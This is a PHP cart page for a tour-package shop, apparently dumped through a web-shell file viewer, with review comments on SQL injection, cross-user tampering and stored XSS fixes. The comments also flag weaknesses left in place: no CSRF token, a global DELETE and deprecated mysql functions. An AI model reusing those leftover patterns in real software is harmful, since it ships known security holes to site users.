
Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/gall/
Current File : /home/admin/domains/happytokorea.com/public_html_bk/gall/cart.php

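<?php include("template/header.php"); ?>
<?php
	// Login gate for the cart page. header.php is included first; presumably
	// that is where the session is started -- confirm, since this file never
	// calls session_start() itself.
	// The array key is quoted: a bare u_id is read as a constant name, which
	// only falls back to the string 'u_id' with a notice on old PHP and is a
	// fatal error on PHP 8.
	if (!isset($_SESSION['u_id'])) {
		// The redirect is client-side, but die() is what enforces the gate:
		// nothing below runs for an anonymous request even if the browser
		// ignores the script tag.
		echo "<script>window.location.href='login.php';</script>";
		die();
	}
?>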

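<?php
	// Cart update handler: runs when the cart form is posted back (the form
	// always carries the hidden p_id[] fields).
	//
	// Every value taken from $_POST is attacker-controlled. The original code
	// concatenated the raw values into DELETE/UPDATE statements, which is SQL
	// injection, and it matched rows on cart_id alone, so a logged-in user
	// could remove or change rows belonging to another user's cart.
	// NOTE(review): the form carries no anti-CSRF token; adding one needs a
	// matching change in the form markup and is not done here.
	if (isset($_POST['p_id'])) {
		// cart_u_id is compared unquoted elsewhere in this file, so the user
		// id is treated as an integer here as well.
		$uid = (int) $_SESSION['u_id'];

		// Unticked checkboxes are not submitted, so cart_delete may be absent.
		$toDelete = (isset($_POST['cart_delete']) && is_array($_POST['cart_delete'])) ? $_POST['cart_delete'] : array();
		foreach ($toDelete as $rawId) {
			if (!is_scalar($rawId)) {
				continue;
			}
			// Integer cast neutralises injected SQL; the owner and status
			// filters limit the delete to this user's open cart, which is
			// the only set of rows the form lists.
			$db->query("delete from cart where cart_id = ".(int) $rawId." and cart_u_id = ".$uid." and cart_status = 0");
		}

		$quantities = (isset($_POST['cart_quty']) && is_array($_POST['cart_quty'])) ? $_POST['cart_quty'] : array();
		$cartIds = (isset($_POST['cart_id']) && is_array($_POST['cart_id'])) ? $_POST['cart_id'] : array();
		foreach ($quantities as $i => $rawQty) {
			// cart_quty[] and cart_id[] are parallel arrays; skip entries
			// that have no partner instead of building a broken statement.
			if (!isset($cartIds[$i]) || !is_scalar($rawQty) || !is_scalar($cartIds[$i])) {
				continue;
			}
			// A negative quantity would turn the line total negative, so it
			// is clamped to 0 (zero-quantity rows are purged further down).
			$qty = max(0, (int) $rawQty);
			$db->query("update cart set cart_quty = ".$qty." where cart_id = ".(int) $cartIds[$i]." and cart_u_id = ".$uid." and cart_status = 0");
		}
	}
?>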
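<?php
	// Promotion-code handler: looks the posted code up in the promotion table
	// and tags the matching products in the current user's open cart with the
	// promotion id.
	//
	// pro_code comes straight from the request; the original placed it inside
	// a quoted SQL literal without escaping (SQL injection). The is_string()
	// check rejects array-shaped input such as pro_code[]=x.
	if (isset($_POST['pro_code']) && is_string($_POST['pro_code'])) {
		$uid = (int) $_SESSION['u_id'];

		// $db exposes no parameter binding in this file and its results are
		// read with mysql_fetch_array(), so the value is escaped with the
		// matching ext/mysql function. Assumes $db has already opened the
		// default mysql link -- TODO confirm.
		$code = mysql_real_escape_string($_POST['pro_code']);
		$pro = $db->queryUniqueObject("select * from promotion where pro_code ='".$code."'");

		// An unknown code yields no row; skip instead of dereferencing a
		// non-object.
		if (is_object($pro)) {
			$proId = (int) $pro->pro_id;
			// pro_data is a comma-separated list of product ids.
			foreach (explode(",", $pro->pro_data) as $productId) {
				if ($productId != "") {
					// Values read back from the database are cast too, so a
					// tampered promotion row cannot inject into this update.
					$db->query("update cart set  cart_pro_id = '".$proId."' where cart_p_id = ".(int) $productId." and cart_u_id=".$uid." and cart_status = 0");
				}
			}
		}
	}
?>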
<?php
// Housekeeping on every page load: drop cart rows whose quantity is zero.
// NOTE(review): the statement is not limited to the current user or to
// cart_status = 0; it touches every zero-quantity row in the cart table.
$purgeEmptyRowsSql = "delete from cart where cart_quty = 0";
$db->query($purgeEmptyRowsSql);
?>
<table border="0" width="100%" cellspacing="0" cellpadding="0">
      
	   	  <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading">What's In My Cart?</td>
            <td class="pageHeading" align="right">&nbsp;</td>
          </tr>

        </table></td>
      </tr>    
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">         
          <tr>
            <td class="otherpages">
<form  action="" method="post"><table border="0" width="100%" cellspacing="0" cellpadding="0" style="">
       
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="100%" height="10"></td>
      </tr>

      <tr>
        <td style="padding:0px 10px 0px 0px;">
<table border="0" width="100%" cellspacing="0" cellpadding="0" class="productListing">
  <tr>
    <td align="center" class="productListing-heading">Remove</td>
    <td class="productListing-heading">Product(s)</td>
    <td align="center" class="productListing-heading">Size</td>
       
    <td align="center" class="productListing-heading">Qty.</td>
     <td align="center" class="productListing-heading">Promotion</td>
    <td align="right" class="productListing-heading">Total</td>

  </tr>
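  <?php
  // Render one table row per open (cart_status = 0) cart line of the current
  // user and accumulate three running sums:
  //   $tps   - sum of line prices before any promotion discount
  //   $tds   - sum of the discounts
  //   $total - sum of the discounted line prices
  //
  // Array keys are quoted (bare words are constant lookups and fatal on
  // PHP 8). Numeric columns are cast to int before being printed or placed
  // in SQL; text columns are HTML-escaped, because product names, sizes and
  // image names come from the database and would otherwise be emitted as
  // raw markup (stored XSS).
  // The charset argument is a single-byte one on purpose: the page encoding
  // is not visible here, and with it the call never rejects a string and
  // only rewrites the ASCII characters & < > " ' -- TODO switch to the
  // page's real charset once confirmed.
  $sql = "select * from cart,product,user where cart_u_id = ".(int) $_SESSION['u_id']." and cart_u_id = u_id and cart_p_id = p_id and cart_status = 0";
  $res = $db->query($sql);
  $total =0;
  $tps=0;
  $tds=0;
  while($line = mysql_fetch_array($res)){
  ?>
  <tr class="productListing-even">
    <td align="center" class="productListing-data" valign="middle">
    <input type="checkbox" name="cart_delete[]" value="<?php echo (int) $line['cart_id']; ?>"></td>
    <td class="productListing-data"><table border="0" cellspacing="2" cellpadding="2"> 
   <tr>   
      <td class="productListing-data" align="center">
      <a href="product.php?p_id=<?php echo (int) $line['cart_p_id']; ?>"><img src="upload/<?php echo htmlspecialchars($line['p_img'], ENT_QUOTES, 'ISO-8859-1');?>" border="0"  width="114">
      </a><br>
<b><?php echo htmlspecialchars($line['p_name'], ENT_QUOTES, 'ISO-8859-1'); ?></b></td>  <!--height="86"-->
      <td class="productListing-data" valign="middle">&nbsp;</td>  </tr></table></td>
    <td align="center" class="productListing-data" valign="middle"><?php echo htmlspecialchars($line['cart_p_size'], ENT_QUOTES, 'ISO-8859-1'); ?></td>
    
    <td align="center" class="productListing-data" valign="middle"><input type="text" name="cart_quty[]" value="<?php echo (int) $line['cart_quty']; ?>" size="4">
    <input type="hidden" name="p_id[]" value="<?php echo (int) $line['p_id']; ?>">
    <input type="hidden" name="cart_id[]" value="<?php echo (int) $line['cart_id']; ?>">
    </td>
    
  <td   class="productListing-data" valign="middle" align="left"><?php
	// Promotion attached to this line, if any. The cast turns an empty or
	// NULL cart_pro_id into 0 instead of producing a truncated statement.
	$dz = $db->queryUniqueObject("select * from promotion where pro_id = ".(int) $line['cart_pro_id']);

	// p_pricex overrides p_price whenever it is filled in.
	if($line['p_pricex']!=''){
		$p=$line['p_pricex'];
	}else{
		$p=$line['p_price'];
	}
	$p = $line['cart_quty']*$p;
	$tps += $p;

	// pro_value is applied as a percentage of the line price. The is_object()
	// guard covers lines with no matching promotion row.
	if(is_object($dz) && $dz->pro_value!=""){
		$ds = (($dz->pro_value/100)*$p);
		$tds += $ds; 
		$p = $p-$ds;
		echo "Discounte :".htmlspecialchars($dz->pro_value, ENT_QUOTES, 'ISO-8859-1')."%";
	}
  ?>&nbsp;</td>

    <td align="right" class="productListing-data" valign="middle"><b>
    	฿ <?php 	echo  number_format($p, 2, '.', ',');
		$total +=$p;
		?>
    &nbsp;&nbsp;&nbsp;</b></td>
  </tr>
  <?php } ?>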
  
</table>
        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="100%" height="10"></td>
      </tr>

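<tr>
        <td align="right" class="main" style="padding:0px 10px 0px 0px;"><b><span style="float:left">Sub-Total:</span> $<?php 
		// $tps: sum of the line prices before promotion discounts.
		// NOTE(review): the per-line totals are printed with a baht sign
		// while the three totals here use "$" -- confirm which is intended.
		echo  number_format($tps, 2, '.', ',');
		?></b></td>
      </tr>
      <tr>
        <td align="right" class="main" style="padding:0px 10px 0px 0px;"><b><span style="float:left">Discounte-Total: </span>$<?php echo  number_format($tds, 2, '.', ',');?></b></td>
      </tr>
      <tr>
        <td align="right" class="main" style="padding:0px 10px 0px 0px;"><b><span style="float:left">Total:</span> $<?php echo  number_format($total, 2, '.', ',');?></b></td>
      </tr>
     <?php
		// Dealer accounts get an extra line. The key is quoted and tested
		// with isset() so a session without the flag raises no notice.
		if(isset($_SESSION['dealer']) && $_SESSION['dealer']=="1"){ ?>
      <tr>
        <td align="right" class="main" style="padding:0px 10px 0px 0px;"><b><span style="float:left">Dealer Price:</span> $<?php 
		// The dealer discount is a percentage kept in the site table under
		// s_name = 'deal'. A missing row is treated as 0 percent.
		// NOTE(review): this only changes the figure shown on this page;
		// whether checkout recomputes it server-side is not visible here.
		$deal = $db->queryUniqueObject("select s_data from site where s_name = 'deal'");
		$dealPercent = is_object($deal) ? $deal->s_data : 0;

		echo number_format($total-($dealPercent*$total)/100, 2, '.', ',');

		?></b></td>
      </tr>
     <?php } ?> 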
   <!--   <tr>  
        <td class="stockWarning" align="center"><br>Products marked with *** dont exist in desired quantity in our stock.<br>You can buy them anyway and check the quantity we have in stock for immediate deliver in the checkout process.</td>
      </tr>-->
         <tr>   
        <td class="stockWarning" align="left"> Promotion Code : <input name="pro_code" type="text" size="10"></td>
      </tr> 
      <tr>

        <td><img src="images/pixel_trans.gif" border="0" alt="" width="100%" height="10"></td>
      </tr>
      <tr>
        <td><table border="0" width="100%" cellspacing="1" cellpadding="2" class="infoBox">
          <tr class="infoBoxContents">
            <td><table border="0" width="100%" cellspacing="0" cellpadding="2">
              <tr>
                <td width="10"><img src="images/pixel_trans.gif" border="0" alt="" width="10" height="1"></td>
                <td class="main"><button class="azbutton" title="Update Cart" type="submit"><table border="0" cellpadding="0" cellspacing="0"><tr><td class="azbutton_left"></td><td class="azbutton_mid">Update Cart</td><td class="azbutton_right"></td></tr></table></button></td>

                <td class="main" align="center">
                  <span class="az-template-button"><span class="az-button-left">&nbsp;</span><span class="az-button-middle">&nbsp;Continue Shopping&nbsp;</span><span class="az-button-right">&nbsp;</span></span>                </td>
                <td align="right" class="main"><a href="checkout.php"><span class="az-template-button"><span class="az-button-left">&nbsp;</span><span class="az-button-middle">&nbsp;Checkout&nbsp;</span><span class="az-button-right">&nbsp;</span></span></a></td>
                <td width="10"><img src="images/pixel_trans.gif" border="0" alt="" width="10" height="1"></td>
              </tr>
            </table></td>
          </tr>
        </table></td>
      </tr>

    </table></form>
			</td>
          </tr>
        </table></td>
      </tr>
    </table>
    <? include("template/footer.php");?>
